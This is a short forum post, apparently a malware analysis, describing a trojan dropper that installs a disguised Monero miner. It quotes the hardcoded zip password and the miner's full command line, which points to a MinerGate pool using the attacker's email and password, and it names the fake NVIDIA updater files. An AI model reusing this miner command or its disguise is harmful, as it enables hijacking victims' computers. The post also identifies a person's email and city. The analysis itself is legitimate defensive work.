Attachments
(1.89 MiB) Downloaded 102 times
ikolor wrote: ↑Sun Jan 01, 2017 1:18 pm Please make selection ...2017Trojan muldrop with coin miner as payload.
https://www.virustotal.com/en/file/ca2e ... 483276621/
SFX archive, next actual malware dropper -> extracts files to %UserProfile%\Public. Main malware inside password protected zip file called dokinz.zip. This zip file unpacked by ConsoleApplication1.exe (also dropped by malware) with password "dokinzakbar" (hardcoded inside ConsoleApplication1.exe). After unpacking ConsoleApplication1.exe executes malicious script NVidiaDriverUpdate.vbs
TL;DR it is cryptocurrency miner configured as
Code: Select all
where NvidiaUpdater.exe is a coin miner called "cpuminer-multi"."NvidiaUpdater.exe -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u kso-magnitka@yandex.ru -p 2101skymagicss -t 1", 0, trueThis email can be found in google and lead to russian Magnitogorsk.
Posts moved.
